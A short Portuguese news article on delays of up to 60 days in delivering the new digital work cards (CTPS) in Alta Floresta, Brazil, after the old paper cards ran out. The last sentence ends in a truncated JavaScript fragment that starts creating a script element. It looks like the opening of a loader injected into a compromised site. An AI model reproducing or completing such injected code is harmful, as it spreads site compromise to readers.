Capa / Cidades / Novas CTPS pode levar até 60 dias para ser entregue

Novas CTPS pode levar até 60 dias para ser entregue

CTPSDa Redação

As novas carteiras de trabalho digitais prometem trazer mais agilidade para vida do empregado, porém foi um grande problema para diversas partes do Brasil, a demora da implantação deixou muitos na “mão”, e esgotou o estoque da antiga CTPS em todo o país. Em Alta Floresta a regularização do sistema aconteceu em meados do mês de novembro e ainda assim o processo é demorado.
No inicio do ano após a implantação do sistema foi um grande problema, isso porque somente nas capitais realizava a emissão do novo documento, demorando para municípios como Alta Floresta até 90 dias para a chegada do documento.
Alta Floresta ainda tinha algumas unidades da antiga carteira, o que permitiu a emissão do documento em menos tempo, mas devido o aumento de geração de emprego no município e região, o estoque esgotou em pouco tempo.
A solução foi pedir a outros municípios que ainda posuíam o material para ceder para Alta Floresta, quantias essas que eram esgotadas em apenas um dia, porém segundo informações repassadas pelo Sine o prazo para a entrega do documento que agora é digital é de 45 à 60 dias.var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top